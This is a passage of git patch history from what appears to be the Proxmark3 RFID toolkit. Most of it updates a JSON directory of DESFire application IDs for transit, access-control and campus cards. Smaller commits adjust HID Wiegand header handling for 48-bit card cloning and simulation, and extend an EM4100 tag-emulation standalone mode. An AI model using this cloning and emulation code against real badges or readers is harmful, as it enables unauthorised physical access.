"Country": "NZ", + "Name": "Access Control", + "Description": "Card Application Directory [CAD]", + "Type": "pacs" + }, + { + "AID": "4791DA", + "Vendor": "Prima Systems", + "Country": "SI", + "Name": "Prima FlexAir Access Control", + "Description": "FIDs 00: DRM; 01: Access Event Log; 04: Access Permissions", + "Type": "pacs" + }, + { + "AID": "53494F", + "Vendor": "HID", + "Country": "US", + "Name": "Access Control", + "Description": "HID Factory", + "Type": "pacs" + }, + { + "AID": "6F706C", + "Vendor": "Openpath", + "Country": "US", + "Name": "Access control", + "Description": "Openpath PACS Application", + "Type": "pacs" + }, { "AID": "D3494F", "Vendor": "HID", "Country": "US", - "Name": "SIO DESFire Ev1", + "Name": "SIO DESFire EV1", "Description": "Field Encoder", "Type": "pacs" }, @@ -24,124 +72,28 @@ "Type": "pacs" }, { - "AID": "53494F", - "Vendor": "HID", - "Country": "US", - "Name": "Access control", - "Description": "HID Factory", + "AID": "F48EF1", + "Vendor": "Salto Systems", + "Country": "ES", + "Name": "Salto Systems", + "Description": "", "Type": "pacs" }, { - "AID": "4F5931", - "Vendor": "Transport for London [TfL]", - "Country": "UK", - "Name": "Oyster Card", - "Description": "FIDs: 00-07: Standard Data", - "Type": "transport" + "AID": "F48EFD", + "Vendor": "Salto Systems", + "Country": "ES", + "Name": "Salto KS", + "Description": "Key as a Service // FID 01: Standard Data", + "Type": "pacs" }, { - "AID": "422201", - "Vendor": "Transport of Istanbul", - "Country": "TR", - "Name": "Istanbulkart", - "Description": "Istanbul Card", - "Type": "transport" - }, - { - "AID": "F21190", - "Vendor": "Metropolitan Transportation Commission / Cubic", - "Country": "US", - "Name": "Clipper Card", + "AID": "F52310", + "Vendor": "Integrated Control Technology Limited [ICT]", + "Country": "NZ", + "Name": "ICT Access Credential", "Description": "", - "Type": "transport" - }, - { - "AID": "000357", - "Vendor": "LEGIC", - "Country": "DE", - "Name": "Legic", - "Description": "FID 02: EF-CONF", - "Type": "" - }, - { - "AID": "578000", - "Vendor": "NORTIC", - "Country": "", - "Name": "NORTIC Card Issuer", - "Description": "FID 0C: Card Issuer Header", - "Type": "transport" - }, - { - "AID": "578001", - "Vendor": "NORTIC", - "Country": "", - "Name": "NORTIC Transport", - "Description": "FIDs 01: Transport Product Retailer; 02: Transport Service Provider; 03: Transport Special Event; 04: Transport Stored Value; 05: Transport General Event Log; 06: Transport SV Reload Log; 0A: Transport Environment; 0C: Transport Card Holder", - "Type": "transport" - }, - { - "AID": "784000", - "Vendor": "Roads & Transport Authority [Government of Dubai]", - "Country": "AE", - "Name": "nol Card", - "Description": "DXB nol Card", - "Type": "transport" - }, - { - "AID": "956B19", - "Vendor": "PING PING", - "Country": "", - "Name": "PingPing Tag", - "Description": "PingPing Tag", - "Type": "" - }, - { - "AID": "DB9800", - "Vendor": "PING PING", - "Country": "", - "Name": "PingPing Tag", - "Description": "PingPing Tag", - "Type": "" - }, - { - "AID": "DB9801", - "Vendor": "PING PING", - "Country": "", - "Name": "PingPing Tag", - "Description": "PingPing Tag", - "Type": "" - }, - { - "AID": "DB9802", - "Vendor": "PING PING", - "Country": "", - "Name": "PingPing Tag", - "Description": "PingPing Tag", - "Type": "" - }, - { - "AID": "F21030", - "Vendor": "Puget Sound Transit Agencies", - "Country": "US", - "Name": "ORCA", - "Description": "VIX / ERG Transit Sysyems // One Regional Card For All // FIDs 02: Trip History; 04: current balance", - "Type": "transport" - }, - { - "AID": "F213F0", - "Vendor": "Puget Sound Transit Agencies", - "Country": "US", - "Name": "ORCA", - "Description": "VIX / ERG Transit Systems // One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", - "Type": "transport" - }, - { - "AID": "F21190", - "Vendor": "Clipper", - "Country": "US", - "Name": "Clipper Card/San Francisco Bay Area ", - "Description": "FIDs 02: current balance; 04: Refill History; 08: Card Information; 0E: Trip History]\\nFFFFFF General Issuer Information // FIDs 00: MAD Version; 01: Card Holder; 02: Card Publisher", - "Type": "transport" + "Type": "pacs" }, { "AID": "F518F0", @@ -152,35 +104,35 @@ "Type": "alarm system" }, { - "AID": "F38091", - "Vendor": "Microtronic AG", - "Country": "CH", - "Name": "Microtronic Tag", - "Description": "", - "Type": "payment system" - }, - { - "AID": "F88280", - "Vendor": "TU Delft", - "Country": "NL", - "Name": "Uni Delft", - "Description": "", + "AID": "05845F", + "Vendor": "InterCard GmbH Kartensysteme", + "Country": "DE", + "Name": "InterCard", + "Description": "Campus Card", "Type": "student" }, { - "AID": "F5217D", - "Vendor": "TU Delft", - "Country": "NL", - "Name": "Uni Delft", - "Description": "", + "AID": "15845F", + "Vendor": "InterCard GmbH Kartensysteme", + "Country": "DE", + "Name": "InterCard", + "Description": "Campus Card", "Type": "student" }, { - "AID": "F48EF1", - "Vendor": "TU Delft", - "Country": "NL", - "Name": "Uni Delft", - "Description": "", + "AID": "25845F", + "Vendor": "InterCard GmbH Kartensysteme", + "Country": "DE", + "Name": "InterCard", + "Description": "Campus Card", + "Type": "student" + }, + { + "AID": "35845F", + "Vendor": "InterCard GmbH Kartensysteme", + "Country": "DE", + "Name": "InterCard", + "Description": "Campus Card", "Type": "student" }, { @@ -272,43 +224,11 @@ "Type": "student" }, { - "AID": "F001D0", - "Vendor": "Arabako Foru Aldundia", - "Country": "", - "Name": "BAT", - "Description": "", - "Type": "transport" - }, - { - "AID": "05845F", - "Vendor": "InterCard GmbH Kartensysteme", - "Country": "DE", - "Name": "InterCard", - "Description": "Campus Card", - "Type": "student" - }, - { - "AID": "15845F", - "Vendor": "InterCard GmbH Kartensysteme", - "Country": "DE", - "Name": "InterCard", - "Description": "Campus Card", - "Type": "student" - }, - { - "AID": "25845F", - "Vendor": "InterCard GmbH Kartensysteme", - "Country": "DE", - "Name": "InterCard", - "Description": "Campus Card", - "Type": "student" - }, - { - "AID": "35845F", - "Vendor": "InterCard GmbH Kartensysteme", - "Country": "DE", - "Name": "InterCard", - "Description": "Campus Card", + "AID": "554E49", + "Vendor": "Slovenian Universities", + "Country": "SI", + "Name": "Slovenian University Student ID", + "Description": "Issued by University of Ljubljana, Maribor and Primorska", "Type": "student" }, { @@ -336,43 +256,27 @@ "Type": "student" }, { - "AID": "C26001", - "Vendor": "CAR2GO", - "Country": "DE", - "Name": "MemberCard", - "Description": "CAR2GO - Member Card", - "Type": "carsharing" + "AID": "F48EF1", + "Vendor": "TU Delft", + "Country": "NL", + "Name": "Uni Delft", + "Description": "", + "Type": "student" }, { - "AID": "2F81F4", - "Vendor": "Gallagher", - "Country": "NZ", - "Name": "Access control", - "Description": "Card Application Directory [CAD]", - "Type": "pacs" + "AID": "F5217D", + "Vendor": "TU Delft", + "Country": "NL", + "Name": "Uni Delft", + "Description": "", + "Type": "student" }, { - "AID": "2081F4", - "Vendor": "Gallagher", - "Country": "NZ", - "Name": "Access control", - "Description": "Cardax Card Data Application", - "Type": "pacs" - }, - { - "AID": "6F706C", - "Vendor": "Openpath", - "Country": "US", - "Name": "Access control", - "Description": "Openpath PACS Application", - "Type": "pacs" - }, - { - "AID": "554E49", - "Vendor": "Slovenian Universities", - "Country": "SI", - "Name": "Slovenian University Student ID", - "Description": "Issued by University of Ljubljana, Maribor and Primorska", + "AID": "F88280", + "Vendor": "TU Delft", + "Country": "NL", + "Name": "Uni Delft", + "Description": "", "Type": "student" }, { @@ -383,14 +287,6 @@ "Description": "", "Type": "payment system" }, - { - "AID": "78E127", - "Vendor": "Disney", - "Country": "US", - "Name": "Disney MagicBand", - "Description": "", - "Type": "payment system" - }, { "AID": "44434C", "Vendor": "Disney", @@ -400,156 +296,60 @@ "Type": "payment system" }, { - "AID": "F21100", - "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", - "Country": "AU", - "Name": "myki", - "Description": "myki App 1 // FIDs 0F: Standard Data; 00: Backup Data", - "Type": "transport" - }, - { - "AID": "F210F0", - "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", - "Country": "AU", - "Name": "myki", - "Description": "myki App 2 // FIDs 01-02: Transaction History; 03: myki money Balance; 00,04-05: Backup Data; 08-0C,0F: Standard Data", - "Type": "transport" - }, - { - "AID": "F206B0", - "Vendor": "Adelaide Metro via Affiliated Computer Services [ACS]", - "Country": "AU", - "Name": "metroCARD", - "Description": "Bus Rail Fare Collection #0 // Not to be confused with CHC Metrocard // FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote / HID Adelaide; 1E: Standard Data; 0C-0F: Card Balance", - "Type": "transport" - }, - { - "AID": "8113F2", - "Vendor": "Chicago Transit Authority [CTA]", + "AID": "78E127", + "Vendor": "Disney", "Country": "US", - "Name": "Ventra Card", - "Description": "Gen 2 Blue Cards // Multi-Modal Transit #1 // FIDs: 00-01 Standard Data", - "Type": "transport" - }, - { - "AID": "F21390", - "Vendor": "Multiple NZ Transit Agencies via Otago Regional Council", - "Country": "NZ", - "Name": "Bee Card", - "Description": "Multi-Modal Transit #0 // FIDs 00: Backup Data; 01-02: Trip History; 03: Card Balance", - "Type": "transport" - }, - { - "AID": "F21050", - "Vendor": "Metro Christchurch via INIT", - "Country": "NZ", - "Name": "Metrocard", - "Description": "Not to be confused with ADL metroCARD // Multi-Modal Transit #0 // FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", - "Type": "transport" - }, - { - "AID": "F21150", - "Vendor": "HAGUESS", - "Country": "CZ", - "Name": "Lítačka / Prague", + "Name": "Disney MagicBand", "Description": "", - "Type": "transport" + "Type": "payment system" }, { - "AID": "F21360", - "Vendor": "INIT", - "Country": "CZ", - "Name": "HOLO", + "AID": "956B19", + "Vendor": "Alfa-Zet", + "Country": "BE", + "Name": "ping.ping Tag", + "Description": "ping.ping Tag", + "Type": "payment system" + }, + { + "AID": "DB9800", + "Vendor": "Alfa-Zet", + "Country": "BE", + "Name": "ping.ping Tag", + "Description": "ping.ping Tag", + "Type": "payment system" + }, + { + "AID": "DB9801", + "Vendor": "Alfa-Zet", + "Country": "BE", + "Name": "ping.ping Tag", + "Description": "ping.ping Tag", + "Type": "payment system" + }, + { + "AID": "DB9802", + "Vendor": "Alfa-Zet", + "Country": "BE", + "Name": "ping.ping Tag", + "Description": "ping.ping Tag", + "Type": "payment system" + }, + { + "AID": "F38091", + "Vendor": "Microtronic AG", + "Country": "CH", + "Name": "Microtronic Tag", "Description": "", - "Type": "transport" + "Type": "payment system" }, { - "AID": "F21381", - "Vendor": "Cubic", - "Country": "US", - "Name": "Ventra", - "Description": "", - "Type": "transport" - }, - { - "AID": "F213A0", - "Vendor": "INIT", - "Country": "US", - "Name": "WAVE / Rhode Island", - "Description": "", - "Type": "transport" - }, - { - "AID": "F210E0", - "Vendor": "Hop Fastpass", - "Country": "", - "Name": "Hop Fastpass", - "Description": "", - "Type": "transport" - }, - { - "AID": "EF2011", - "Vendor": "HSL", - "Country": "FI", - "Name": "HSL / Helsinki", - "Description": "", - "Type": "transport" - }, - { - "AID": "A00216", - "Vendor": "ITSO", - "Country": "", - "Name": "ITSO", - "Description": "", - "Type": "transport" - }, - { - "AID": "554000", - "Vendor": "Auckland Transport", - "Country": "NZ", - "Name": "AT HOP Card", - "Description": "FIDs: 00: Backup Data; 08/09/0A", - "Type": "transport" - }, - { - "AID": "534531", - "Vendor": "Transport for New South Wales [TfNSW]", - "Country": "AU", - "Name": "Opal Card", - "Description": "FIDs 00-06: Standard Data; 07: Card Balance/Number and Trip History", - "Type": "transport" - }, - { - "AID": "2211AF", - "Vendor": "National Transport Authority", - "Country": "IE", - "Name": "TFI Leap Card", - "Description": "Transport for Ireland // FIDs: 01/1F: Backup Data; 02/0A/03/04/05/06/07/08/09: Standard Data", - "Type": "transport" - }, - { - "AID": "015342", - "Vendor": "BEM", - "Country": "TH", - "Name": "BEM / Bangkok", - "Description": "", - "Type": "transport" - }, - { - "AID": "012242", - "Vendor": "Istanbulkart", - "Country": "TR", - "Name": "Istanbulkart / Istanbul", - "Description": "", - "Type": "transport" - }, - { - "AID": "010000", - "Vendor": "Madrid Public Transit Card", - "Country": "ES", - "Name": "Madrid Public Transit Card", - "Description": "", - "Type": "transport" + "AID": "C26001", + "Vendor": "CAR2GO", + "Country": "DE", + "Name": "MemberCard", + "Description": "CAR2GO - Member Card", + "Type": "carsharing" }, { "AID": "000001", @@ -559,6 +359,238 @@ "Description": "Used by YVR Compass and ATL Breeze", "Type": "transport" }, + { + "AID": "002000", + "Vendor": "Metrolinx", + "Country": "CA", + "Name": "PRESTO Card [YYZ/YHM/YOW]", + "Description": "FIDs 00,0F: Backup Data; 08-0E,10-14: Standard Data", + "Type": "transport" + }, + { + "AID": "010000", + "Vendor": "Consorcio Regional de Transportes Públicos Regulares de Madrid [CRTM]", + "Country": "ES", + "Name": "Tarjeta Transporte Publico [MAD]", + "Description": "MAD Public Transport Card", + "Type": "transport" + }, + { + "AID": "012242", + "Vendor": "Istanbulkart", + "Country": "TR", + "Name": "Istanbulkart [IST]", + "Description": "IST Istanbul Card", + "Type": "transport" + }, + { + "AID": "015342", + "Vendor": "Bangkok Expressway and Metro Public Limited Company [BEM]", + "Country": "TH", + "Name": "MRT Stored Value Card [BKK]", + "Description": "Might also be used by BKK MRT Plus and/or BKK Park & Ride Plus Cards", + "Type": "transport" + }, + { + "AID": "2211AF", + "Vendor": "National Transport Authority", + "Country": "IE", + "Name": "TFI Leap Card [DUB]", + "Description": "DUB Leap Card // Transport for Ireland // FIDs: 01,1F: Backup Data; 02-0A: Standard Data", + "Type": "transport" + }, + { + "AID": "4F5931", + "Vendor": "Transport for London [TfL]", + "Country": "UK", + "Name": "Oyster Card [LHR]", + "Description": "FIDs: 00-07: Standard Data", + "Type": "transport" + }, + { + "AID": "422201", + "Vendor": "Transport of Istanbul", + "Country": "TR", + "Name": "İstanbulkart [IST]", + "Description": "IST Istanbul Card", + "Type": "transport" + }, + { + "AID": "534531", + "Vendor": "Transport for New South Wales [TfNSW]", + "Country": "AU", + "Name": "Opal Card [SYD]", + "Description": "FIDs 00-06: Standard Data; 07: Card Balance/Number and Trip History", + "Type": "transport" + }, + { + "AID": "554000", + "Vendor": "Auckland Transport", + "Country": "NZ", + "Name": "AT HOP Card [AKL]", + "Description": "FIDs: 00: Backup Data; 08/09/0A", + "Type": "transport" + }, + { + "AID": "578000", + "Vendor": "Norwegian Public Roads Administration [NPRA]", + "Country": "NO", + "Name": "NORTIC Transport", + "Description": "Norwegian Ticketing Interoperable Concept // FID 0C: Card Issuer Header", + "Type": "transport" + }, + { + "AID": "578001", + "Vendor": "Norwegian Public Roads Administration [NPRA]", + "Country": "NO", + "Name": "NORTIC Transport", + "Description": "FIDs 01: Product Retailer; 02: Service Provider; 03: Special Event; 04: Stored Value; 05: General Event Log; 06: SV Reload Log; 0A: Environment; 0C: Card Holder", + "Type": "transport" + }, + { + "AID": "784000", + "Vendor": "Roads & Transport Authority [Government of Dubai]", + "Country": "AE", + "Name": "nol Card [DXB]", + "Description": "DXB nol Card", + "Type": "transport" + }, + { + "AID": "A00216", + "Vendor": "ITSO Ltd", + "Country": "UK", + "Name": "ITSO", + "Description": "Appears to be used across UK Transit Agencies except LHR Oyster.", + "Type": "transport" + }, + { + "AID": "EF2011", + "Vendor": "Helsinki Region Transport [HRT]", + "Country": "FI", + "Name": "HSL Card [HEL/TLL/TAY]", + "Description": "HEL/TLL/TAY HSL Card", + "Type": "transport" + }, + { + "AID": "F001D0", + "Vendor": "Arabako Foru Aldundia", + "Country": "ES", + "Name": "BAT Card [VIT]", + "Description": "VIT BAT Card", + "Type": "transport" + }, + { + "AID": "F206B0", + "Vendor": "Adelaide Metro via Affiliated Computer Services [ACS]", + "Country": "AU", + "Name": "metroCARD [ADL]", + "Description": "FIDs 00,02-07,09-0B,10-17,1B-1C: Backup Data; 01,1D: Linear Record File; 08: ABNote/HID Adelaide; 1E: Standard Data; 0C-0F: Card Balance", + "Type": "transport" + }, + { + "AID": "F21030", + "Vendor": "Puget Sound Transit Agencies via Vix Technologies", + "Country": "US", + "Name": "ORCA [SEA]", + "Description": "One Regional Card For All // FIDs 02: Trip History; 04: current balance", + "Type": "transport" + }, + { + "AID": "F21050", + "Vendor": "Metro Christchurch via INIT", + "Country": "NZ", + "Name": "Metrocard [CHC]", + "Description": "FIDs: 00: Backup Data; 01/02: Trip History; 03: Card Balance", + "Type": "transport" + }, + { + "AID": "F210E0", + "Vendor": "TriMet", + "Country": "US", + "Name": "Hop Fastpass [PDX]", + "Description": "PDX Hop Card", + "Type": "transport" + }, + { + "AID": "F210F0", + "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", + "Country": "AU", + "Name": "myki [MEL]", + "Description": "FIDs 01-02: Transaction History; 03: myki money Balance; 00,04-05: Backup Data; 08-0C,0F: Standard Data", + "Type": "transport" + }, + { + "AID": "F21100", + "Vendor": "Public Transport Victoria [PTV] via Conduent [formerly via Keane Australia Pty Ltd]", + "Country": "AU", + "Name": "myki [MEL]", + "Description": "FIDs 0F: Standard Data; 00: Backup Data", + "Type": "transport" + }, + { + "AID": "F21150", + "Vendor": "Prague Public Transit Company via Haguess a.s.", + "Country": "CZ", + "Name": "Lítačka Opencard [PRG]", + "Description": "PRG Lítačka Opencard", + "Type": "transport" + }, + { + "AID": "F21190", + "Vendor": "Metropolitan Transportation Commission via Cubic", + "Country": "US", + "Name": "Clipper Card [SFO]", + "Description": "FIDs 02: Card Balance; 04: Refill History; 08: Card Information; 0E: Trip History", + "Type": "transport" + }, + { + "AID": "F21360", + "Vendor": "INIT", + "Country": "US", + "Name": "HOLO Card [HNL]", + "Description": "HNL HOLO Card", + "Type": "transport" + }, + { + "AID": "F21381", + "Vendor": "Chicago Transit Authority [CTA] via Cubic", + "Country": "US", + "Name": "Ventra Card [ORD]", + "Description": "ORD Ventra Card [Gen 2 Blue] // Multi-Modal Transit #1 // FIDs 00-01: Standard Data", + "Type": "transport" + }, + { + "AID": "F21390", + "Vendor": "Multiple NZ Transit Agencies via Otago Regional Council", + "Country": "NZ", + "Name": "Bee Card [DUD]", + "Description": "Multi-Modal Transit #0 // FIDs 00: Backup Data; 01-02: Trip History; 03: Card Balance", + "Type": "transport" + }, + { + "AID": "F213A0", + "Vendor": "Rhode Island Public Transport Authority [RIPTA] via INIT", + "Country": "US", + "Name": "Wave Smart Card [PVD]", + "Description": "PVD Wave Smart Card", + "Type": "transport" + }, + { + "AID": "F213F0", + "Vendor": "Puget Sound Transit Agencies via Vix Technologies", + "Country": "US", + "Name": "ORCA [SEA]", + "Description": "One Regional Card for All // FIDs 00: Standard Data; 01: Backup Data", + "Type": "transport" + }, + { + "AID": "FF30FF", + "Vendor": "Metrolinx", + "Country": "CA", + "Name": "PRESTO Card [YYZ/YHM/YOW]", + "Description": "FID 08: Standard Data", + "Type": "transport" + }, { "AID": "FFFFFF", "Vendor": "Reserved for Future Use", @@ -566,53 +598,5 @@ "Name": "Reserved for Future Use", "Description": "Used by AKL AT HOP, DXB nol, and SEA ORCA", "Type": "transport" - }, - { - "AID": "F52310", - "Vendor": "Integrated Control Technology Limited [ICT]", - "Country": "NZ", - "Name": "ICT Access credential", - "Description": "", - "Type": "pacs" - }, - { - "AID": "F48EF1", - "Vendor": "Salto Systems", - "Country": "ES", - "Name": "Salto Systems", - "Description": "", - "Type": "pacs" - }, - { - "AID": "4791DA", - "Vendor": "Prima Systems", - "Country": "SI", - "Name": "Prima FlexAir Access Control", - "Description": "FIDs 00: DRM; 01: Access Event Log; 04: Access Permissions", - "Type": "pacs" - }, - { - "AID": "FF30FF", - "Vendor": "Metrolinx", - "Country": "CA", - "Name": "PRESTO Card", - "Description": "FID 08: Standard Data", - "Type": "transport" - }, - { - "AID": "002000", - "Vendor": "Metrolinx", - "Country": "CA", - "Name": "PRESTO Card", - "Description": "FIDs 00,0F: Backup Data; 08-0E,10-14: Standard Data", - "Type": "transport" - }, - { - "AID": "F48EFD", - "Vendor": "Salto Systems", - "Country": "ES", - "Name": "Salto KS", - "Description": "Access Control #13 // Key as a Service // FID 01: Standard Data", - "Type": "pacs" } ] From 7f2486a6becce170ac79638abdf01f903f733411 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 18 Jun 2024 23:35:35 +1000 Subject: [PATCH 053/112] Update aid_desfire.json Minor typo correction. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 986aac08a..efae8446b 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -11,7 +11,7 @@ "AID": "000357", "Vendor": "LEGIC", "Country": "DE", - "Name": "Legic", + "Name": "LEGIC", "Description": "FID 02: EF-CONF", "Type": "pacs" }, From f80e8d0f852122082b44e8f5a75aaf1bc5a40c20 Mon Sep 17 00:00:00 2001 From: "@tweathers-sec" Date: Wed, 19 Jun 2024 13:41:37 -0400 Subject: [PATCH 054/112] Updated clone and sim handling for 48-Bit HID (C1k48s) --- client/src/wiegand_formatutils.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/client/src/wiegand_formatutils.c b/client/src/wiegand_formatutils.c index 75aa6ae2f..d279744b9 100644 --- a/client/src/wiegand_formatutils.c +++ b/client/src/wiegand_formatutils.c @@ -196,6 +196,10 @@ bool add_HID_header(wiegand_message_t *data) { if (data->Length > 84 || data->Length == 0) return false; + if (data->Length == 48) { + data->Mid |= 1U << (data->Length - 32); // Example leading 1: start bit + return true; + } if (data->Length >= 64) { data->Top |= 0x09e00000; // Extended-length header data->Top |= 1U << (data->Length - 64); // leading 1: start bit From 1c42223c6cbc8dfe11239d9bbc0524629db8e699 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sat, 22 Jun 2024 10:19:05 +1000 Subject: [PATCH 055/112] Update aid_desfire.json Added a new PACS AID. Corrected minor formatting typo. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index efae8446b..63a7e0dc5 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -87,6 +87,14 @@ "Description": "Key as a Service // FID 01: Standard Data", "Type": "pacs" }, + { + "AID": "F51BC0", + "Vendor": "", + "Country": "", + "Name": "", + "Description": "Unknown MF3DH42 [MFDES EV2]", + "Type": "pacs" + }, { "AID": "F52310", "Vendor": "Integrated Control Technology Limited [ICT]", @@ -530,7 +538,7 @@ { "AID": "F21150", "Vendor": "Prague Public Transit Company via Haguess a.s.", - "Country": "CZ", + "Country": "CZ", "Name": "Lítačka Opencard [PRG]", "Description": "PRG Lítačka Opencard", "Type": "transport" From f70550486316bc8742c83d3661f33a1beab6f1e4 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sat, 22 Jun 2024 14:08:15 +1000 Subject: [PATCH 056/112] Update aid_desfire.json Added information via NXP TagInfo. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 63a7e0dc5..4af891541 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -89,10 +89,10 @@ }, { "AID": "F51BC0", - "Vendor": "", - "Country": "", - "Name": "", - "Description": "Unknown MF3DH42 [MFDES EV2]", + "Vendor": "STid Group", + "Country": "FR", + "Name": "CCT Card / DTA Tag / PCG Fob", + "Description": "STid Easyline / Architect Access Credetials", "Type": "pacs" }, { From a8ac0f3053a757217cbddb2744bba7238984af13 Mon Sep 17 00:00:00 2001 From: Dani Date: Sun, 23 Jun 2024 17:14:59 +0200 Subject: [PATCH 057/112] Update lf_em4100emul.c Rename fucntions (to avoid conflictinf with other standalone modes), print what ID is emulating and allow exit emulation with button long-press Signed-off-by: Dani --- armsrc/Standalone/lf_em4100emul.c | 28 +++++++++++++++++++--------- 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/armsrc/Standalone/lf_em4100emul.c b/armsrc/Standalone/lf_em4100emul.c index 614ca44ea..324d541bb 100644 --- a/armsrc/Standalone/lf_em4100emul.c +++ b/armsrc/Standalone/lf_em4100emul.c @@ -41,7 +41,7 @@ void ModInfo(void) { DbpString(" LF EM4100 simulator standalone mode"); } -static uint64_t rev_quads(uint64_t bits) { +static uint64_t em4100emul_rev_quads(uint64_t bits) { uint64_t result = 0; for (int i = 0; i < 16; i++) { result += ((bits >> (60 - 4 * i)) & 0xf) << (4 * i); @@ -49,7 +49,7 @@ static uint64_t rev_quads(uint64_t bits) { return result >> 24; } -static void fill_buff(uint8_t bit) { +static void em4100emul_fill_buff(uint8_t bit) { uint8_t *bba = BigBuf_get_addr(); memset(bba + em4100emul_buflen, bit, LF_CLOCK / 2); em4100emul_buflen += (LF_CLOCK / 2); @@ -57,7 +57,7 @@ static void fill_buff(uint8_t bit) { em4100emul_buflen += (LF_CLOCK / 2); } -static void construct_EM410x_emul(uint64_t id) { +static void em4100emul_construct_EM410x_emul(uint64_t id) { int i, j; int binary[4] = {0, 0, 0, 0}; @@ -65,24 +65,24 @@ static void construct_EM410x_emul(uint64_t id) { em4100emul_buflen = 0; for (i = 0; i < 9; i++) - fill_buff(1); + em4100emul_fill_buff(1); for (i = 0; i < 10; i++) { for (j = 3; j >= 0; j--, id /= 2) binary[j] = id % 2; for (j = 0; j < 4; j++) - fill_buff(binary[j]); + em4100emul_fill_buff(binary[j]); - fill_buff(binary[0] ^ binary[1] ^ binary[2] ^ binary[3]); + em4100emul_fill_buff(binary[0] ^ binary[1] ^ binary[2] ^ binary[3]); for (j = 0; j < 4; j++) parity[j] ^= binary[j]; } for (j = 0; j < 4; j++) - fill_buff(parity[j]); + em4100emul_fill_buff(parity[j]); - fill_buff(0); + em4100emul_fill_buff(0); } static void LED_Slot(int i) { @@ -108,8 +108,18 @@ void RunMod(void) { SpinDelay(100); SpinUp(100); LED_Slot(selected); - construct_EM410x_emul(rev_quads(em4100emul_low[selected])); + Dbprintf("Emulating 0x%010llX", em4100emul_low[selected]); + em4100emul_construct_EM410x_emul(em4100emul_rev_quads(em4100emul_low[selected])); SimulateTagLowFrequency(em4100emul_buflen, 0, true); + + //Exit! Button hold break + int button_pressed = BUTTON_HELD(500); + if (button_pressed == BUTTON_HOLD) { + Dbprintf("Button hold, Break!"); + LEDsoff(); + Dbprintf("[=] >> LF EM4100 simulator stopped due to button hold <<"); + return; // RunMod end + } selected = (selected + 1) % em4100emul_slots_count; } } From ca2dc0231963d0007881bf55b2cc9eba0a7b92ac Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 24 Jun 2024 15:45:32 +1000 Subject: [PATCH 058/112] Update aid_desfire.json Corrected Gallagher AIDs to the PM3/Flipper Zero / NXP TagInfo format. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 124 ++++++++++++++++++++++++++++-- 1 file changed, 118 insertions(+), 6 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 4af891541..331b76cf2 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -16,18 +16,130 @@ "Type": "pacs" }, { - "AID": "2081F4", - "Vendor": "Gallagher", + "AID": "F48120", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", "Country": "NZ", - "Name": "Access Control", + "Name": "Gallagher Security Credential", "Description": "Cardax Card Data Application", "Type": "pacs" }, { - "AID": "2F81F4", - "Vendor": "Gallagher", + "AID": "F48121", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", "Country": "NZ", - "Name": "Access Control", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48122", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48123", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48124", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48125", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48126", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48127", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48128", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "F48129", + "Vendor": "Gallagher Group Limited via PEC [New Zealand] Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + 